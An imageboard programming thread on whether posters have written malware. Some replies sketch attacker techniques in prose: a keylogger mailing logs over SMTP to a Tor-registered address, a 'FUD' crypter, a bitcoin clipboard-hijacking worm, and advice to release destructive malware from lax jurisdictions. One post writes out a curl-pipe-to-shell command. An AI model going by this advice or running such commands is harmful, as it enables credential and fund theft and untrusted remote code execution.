arisuchan    [ tech / cult / art ]   [ λ / Δ ]   [ psy ]   [ ru ]   [ random ]   [ meta ]   [ all ]    info / stickers     temporarily disabledtemporarily disabled

/λ/ - programming

structure and interpretation of computer programs.
Name
Email
Subject
Comment

formatting options

File
Password (For file deletion.)

Help me fix this shit. https://legacy.arisuchan.jp/q/res/2703.html#2703

Kalyx ######


File: 1497467099226.png (14.21 KB, 246x614, scr.PNG)

 No.241

Have you ever coded a malware ? ,
-if yes what language you used ;
-if no why not ?

 No.244

Made a toy malware once, in C, for OSX. Submitted immediately to Kaspersky to know if they'd consider it malicious. They did. It's been on their database ever since.

When I was younger I coded a couple of virii in vbscript. They got caught by Norton simply by heuristic, I never spread them around.

 No.247

Usually just things to play with by myself. Mostly in C, but also some assembly, particularly for DOS and Windows.
It was usually just for curiosity, I read a bit about how a virus or a worm is done, then see the source for one, and then I write something similar to what I read and test it. Nothing beyond that though.

 No.249

Damn I just realized I responded to an FBI thread.
Serves me right for using the web at all

 No.288

No never have. Wouldn't know where to start tbqhwyf

 No.298

>>241
Yes, in both Python and Ocaml. Never deployed it because I'm not a prick.
Unless you consider code that just aimlessly fucks soykaf up real malware. If that's the case, I've written malware in damn near every language just for the hyucks.

 No.394

No, but I want to. Specifically I want to make a worm that makes the machines it infects mine bitcoin for me.

 No.396

>Have you ever coded a malware ? ,
I made a crypter "FUD" and I am trying to make the perfect keylogger, it will send the logs using SMTP, but I can't find any good email library for Windows, so I will have to code the SMTP library (it's not easy to implement the protocol), plus I am using Debian, so it's harder to code an executable for Windows :P, I need to make everything inside a slow VM. The source code for the keylogger will be released when I finish it.
The advantages of sending the logs with SMTP is that it will be anonymous for the attacker, normally, a direct connection can real the attacker's ip, that's dangerous for the attacker. But If you register an email using tor (your ip won't be related to it), the only thing the victim can know is the email you used, then, you just login to your email and the logs will be there.

>What language you used?

C and CPP

 No.397

>>249
You should be posting here from behind a proxy, on a VPN, or Tor. I don't believe Virus writing to be illegal. I think it is only a crime if you release it and it causes damage.

Some countries don't have laws against data destruction such as Bulgaria. You could write and release it there and be ok.

 No.485

No but I'd like to. Not to fuck people's soykaf up or make money but just to see how it spreads. I'd love to make some virus that keeps track of through which computers it arrived and sends this to some server, this could make for some nice data visualisations :D
That said I'd probably never do it for fear of getting caught breaking into people's computers

 No.490

>>249
Writing software is not a crime. However using one to gain unauthorized access or to cause harm is a criminal offense. Software is just software and then there are intentions of the people who use or abuse them.

To answer your question OP, yes I mostly prototyped several spyware programs in Python and might recreate one of them in C++. Authoring "malware" is not an edgy thing to do and actually lots of security contractors do it for the government under more politically correct names.

Personally I hate the exploit development process but I like the payload development since it is the part where you can get more creative and use your critical thinking to make sure the software remains secure and also operates at full capacity. Real life scenarios where you are doing it as an APT is not that fun though, because then stuff like software maintenance and backwards compatibility etc. comes into play. Think it as another office software, except this time they don't know about it.

And as a bonus here is some development tradecraft from the CIA itself:
https://wikileaks.org/ciav7p1/cms/page_14587109.html

 No.510

>>241
Every time I think of doing this I can't help but open the website and start playing manually. Why is it so addictive?

 No.511

Picture with botnets…

You're pretty away from real malware.

 No.577

>>511
may i ask what's real malware?

 No.621

I played around with one in C. It was a mess though and mostly to learn a few different techniques - shell coding, obfuscation, windows internals - everything to get you started can be found on github.

 No.622

>>394
This is very difficult, for a number of reasons. Its also very detectable to the point where basic C functions that run the algo to mine Bitcoin even get picked up as "PUP" samples by AV now (Potentially Unwated Programs)

 No.623

>>397
This is correct, at least for the United States. You can write viruses, and even sell them for a profit. But if you use them illegally, sell them to be used illegally, or if people use them illegally and you were at fault, you can get royally fucked.

Look up the current case going on with MalwareTechBlog. He allegedly was involved in the creation of the Kronos banking malware which isn't illegal by itself, but could be illegal if it was used for malicious purposes or sold with malicious intent.

 No.672

File: 1505658930676.webm (141.41 KB, 640x448, lunar.webm)

Yeah, I've written a few simple malicious scripts in vbscript / powershell / batch that would be invoked from a Word document. I do this to write something that will imitate stuff that comes into the network at my job to see if we can detect or block the attack.

The stuff we see most commonly is really boring. Just drops an exe that either encrypts the box or checks in with a C2 server for commands.

I'm sure there's more complexity to some of these infections, but I can't think of a better way to quickly reverse engineer the malware other than using one of our sandboxes, VT, or just googling to see if someone else has encountered the threat.

 No.710

I used Python (with some kinda minimal posix-dash bootstrapper iirc) because it runs on OSX and allows me to easily do whatever I want via
>curl ix.io/asdf | sh

 No.821

>>577
XSS Worms.

 No.822

File: 1508652257022.gif (508.12 KB, 500x467, Well shit source httpmemef….gif)

Other than simple babbys first keylogger and a few macros no.

honestly, I've never been to good at programming, I've been trying to get better but my skills are lacking

>mfw this isn't /cyb/

>mfw I already written my post

 No.823

>>821
>You're pretty away from real malware.
>XSS Worms.

Lol.

 No.824

>>822
> I've never been to good at programming,
With a lot of practice, you'll get the hang of it.
Programming is really not that difficult once you do it enough.

 No.828

For those who are interested in programming malware, I found this good paper about it on Exploit db!

https://www.exploit-db.com/docs/42250.pdf

 No.831

>>241
>if no why not ?
I like to improve my own system (writing scripts in bash, my own little tools in C, etc.) and sharing them with others or trying to work on bigger tools with friends and/or strangers.
Writing malware isn't interesting to me, I don't really see a point in trying to harm the computers of random people that happen to download my program.
I'm not bashing anyone that likes that side of programming, but security & penetration isn't a particular interest of mine.
I just want to write useful little programs and share them with others.

 No.838

>>241
I made a DOS malware once that rot13'd the dos fonts. It didn't infect any other files though.

 No.846

Have always considered it but never entertained any action towards it. Might do something about it in the future, however. Though I would never deploy it because recklessly destroying soykaf sounds pointless.

 No.847

It depends what you consider malware.
I've never written anything for the purpose of "recklessly destroying ѕhіt".

 No.1184

does anyone know any "security-oriented" programming communities? here's the ones i know that might give you some idea:

https://www.rohitab.com/discuss/
https://zwclose7.createaforum.com/
https://www.unknowncheats.me/

no "hackforums" tier skid communities please. just genuine people interested in os internals and system programming preferably security-oriented.

 No.1187

File: 1528595051620.png (227.47 KB, 800x334, blade-runner-anime-cowboy-….png)

>>241

Yes.
C, Bash, Powershell, Python, Java, JavaScript.

Reading this thread and realizing how low of a threat Lainchan really is. It's 2018. You guys can get paid for this type of dev.

>>1184
A million times yes. Rohitab is awesome, and zwclose7 has been my favorite since 2014.

 No.1188

A friend of mine made a worm which sits silently until a bitcoin address is copied… Once one is, the address is altered slightly and the original is uploaded to pastebin.

 No.1191

>>241
Nice bait, Honeypot-kun.

 No.1242

>>241
Yes.
It's even been on the news.
The attack was successful.
Can't tell any details, obviously.

 No.1249

File: 1530243023836.png (15.49 KB, 767x507, 1328571582913.png)

>>1242
Maybe you could tell us the story without revealing the specific case?

 No.1258

>>1242
Sure..

 No.1271

>>1242
pls, just use tor you could tell us all the details if they were.

 No.1274

>>1271
Don't believe everything someone writes on the internet. If it really was that big, he would mind 100% OPSEC and never would mention details like he already did. Or he is completely dumb.

 No.1275

>>1274
I agree with this.
I bet he is just a LARPing script kiddie.

 No.1277

left around some flash drives which autobooted a vbscript to change all system sounds to a stereotypical clown nose honk, back in college

100% worth it when I finally heard one go off in the wild



[Return] [Go to top] [ Catalog ] [Post a Reply]
Delete Post [ ]